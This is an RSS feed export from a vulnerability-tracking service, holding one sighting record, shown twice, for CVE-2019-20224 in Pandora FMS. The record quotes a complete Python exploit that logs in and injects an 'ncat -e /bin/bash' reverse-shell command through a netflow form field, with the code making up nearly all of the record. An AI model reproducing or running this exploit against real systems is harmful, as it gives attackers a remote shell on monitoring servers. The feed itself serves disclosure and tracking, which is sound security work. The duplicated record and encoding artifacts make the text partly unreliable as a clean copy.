https://vulnerability.circl.lu Contains only the most 10 recent sightings. http://www.rssboard.org/rss-specification python-feedgen en Wed, 06 May 2026 03:12:07 +0000 https://vulnerability.circl.lu/sighting/9deff425-22e5-4ba0-ab12-bdb93ef1d349/export {"uuid": "9deff425-22e5-4ba0-ab12-bdb93ef1d349", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2019-20224", "type": "published-proof-of-concept", "source": "https://t.me/indoghostsec/1667", "content": "*INDO GHOST SECURITY*\n\n*CVE-2019-20224*\nsource: https://cxsecurity.com/issue/WLB-2020010094\n\n\n# Date: 2019-11-14\n# Exploit Author: Askar (@mohammadaskar2)\n# CVE: CVE-2019-20224\n# Vendor Homepage: https://pandorafms.org/\n# Software link: https://pandorafms.org/features/free-download-monitoring-software/\n# Version: v7.0NG\n# Tested on: CentOS 7.3 / PHP 5.4.16\n\n\n\n\n#!/usr/bin/python3\n\nimport requests\nimport sys\n\nif len(sys.argv) !=3D 6:\n print(\"[+] Usage : ./exploit.py target username password ip port\")\n exit()\n\ntarget =3D sys.argv[1]\nusername =3D sys.argv[2]\npassword =3D sys.argv[3]\nip =3D sys.argv[4]\nport =3D int(sys.argv[5])\n\nrequest =3D requests.session()\n\nlogin_info =3D {\n \"nick\": username,\n \"pass\": password,\n \"login_button\": \"Login\"\n}\n\nlogin_request =3D request.post(\n target+\"/pandora_console/index.php?login=3D1\",\n login_info,\n verify=3DFalse,\n allow_redirects=3DTrue\n )\n\nresp =3D login_request.text\n\nif \"User not found in database\" in resp:\n print(\"[-] Login Failed\")\n exit()\nelse:\n print(\"[+] Logged In Successfully\")\n\nprint(\"[+] Sending crafted graph request ..\")\n\nbody_request =3D {\n \"date\": \"0\",\n \"time\": \"0\",\n \"period\": \"0\",\n \"interval_length\": \"0\",\n \"chart_type\": \"netflow_area\",\n \"max_aggregates\": \"1\",\n \"address_resolution\": \"0\",\n \"name\": \"0\",\n \"assign_group\": \"0\",\n \"filter_type\": \"0\",\n \"filter_id\": \"0\",\n \"filter_selected\": \"0\",\n \"ip_dst\": \"0\",\n \"ip_src\": '\";ncat -e /bin/bash {0} {1} #'.format(ip, port),\n \"draw_button\": \"Draw\"\n}\n\ndraw_url =3D target + \"/pandora_console/index.php?sec=3Dnetf&sec2=3Doperati=\non/netflow/nf_live_view&pure=3D0\"\nprint(\"[+] Check your netcat ;)\")\nrequest.post(draw_url, body_request)\n\n\nPstar8999", "creation_timestamp": "2020-01-18T13:24:25.000000Z"} {"uuid": "9deff425-22e5-4ba0-ab12-bdb93ef1d349", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2019-20224", "type": "published-proof-of-concept", "source": "https://t.me/indoghostsec/1667", "content": "*INDO GHOST SECURITY*\n\n*CVE-2019-20224*\nsource: https://cxsecurity.com/issue/WLB-2020010094\n\n\n# Date: 2019-11-14\n# Exploit Author: Askar (@mohammadaskar2)\n# CVE: CVE-2019-20224\n# Vendor Homepage: https://pandorafms.org/\n# Software link: https://pandorafms.org/features/free-download-monitoring-software/\n# Version: v7.0NG\n# Tested on: CentOS 7.3 / PHP 5.4.16\n\n\n\n\n#!/usr/bin/python3\n\nimport requests\nimport sys\n\nif len(sys.argv) !=3D 6:\n print(\"[+] Usage : ./exploit.py target username password ip port\")\n exit()\n\ntarget =3D sys.argv[1]\nusername =3D sys.argv[2]\npassword =3D sys.argv[3]\nip =3D sys.argv[4]\nport =3D int(sys.argv[5])\n\nrequest =3D requests.session()\n\nlogin_info =3D {\n \"nick\": username,\n \"pass\": password,\n \"login_button\": \"Login\"\n}\n\nlogin_request =3D request.post(\n target+\"/pandora_console/index.php?login=3D1\",\n login_info,\n verify=3DFalse,\n allow_redirects=3DTrue\n )\n\nresp =3D login_request.text\n\nif \"User not found in database\" in resp:\n print(\"[-] Login Failed\")\n exit()\nelse:\n print(\"[+] Logged In Successfully\")\n\nprint(\"[+] Sending crafted graph request ..\")\n\nbody_request =3D {\n \"date\": \"0\",\n \"time\": \"0\",\n \"period\": \"0\",\n \"interval_length\": \"0\",\n \"chart_type\": \"netflow_area\",\n \"max_aggregates\": \"1\",\n \"address_resolution\": \"0\",\n \"name\": \"0\",\n \"assign_group\": \"0\",\n \"filter_type\": \"0\",\n \"filter_id\": \"0\",\n \"filter_selected\": \"0\",\n \"ip_dst\": \"0\",\n \"ip_src\": '\";ncat -e /bin/bash {0} {1} #'.format(ip, port),\n \"draw_button\": \"Draw\"\n}\n\ndraw_url =3D target + \"/pandora_console/index.php?sec=3Dnetf&sec2=3Doperati=\non/netflow/nf_live_view&pure=3D0\"\nprint(\"[+] Check your netcat ;)\")\nrequest.post(draw_url, body_request)\n\n\nPstar8999", "creation_timestamp": "2020-01-18T13:24:25.000000Z"} https://vulnerability.circl.lu/sighting/9deff425-22e5-4ba0-ab12-bdb93ef1d349/export Sat, 18 Jan 2020 13:24:25 +0000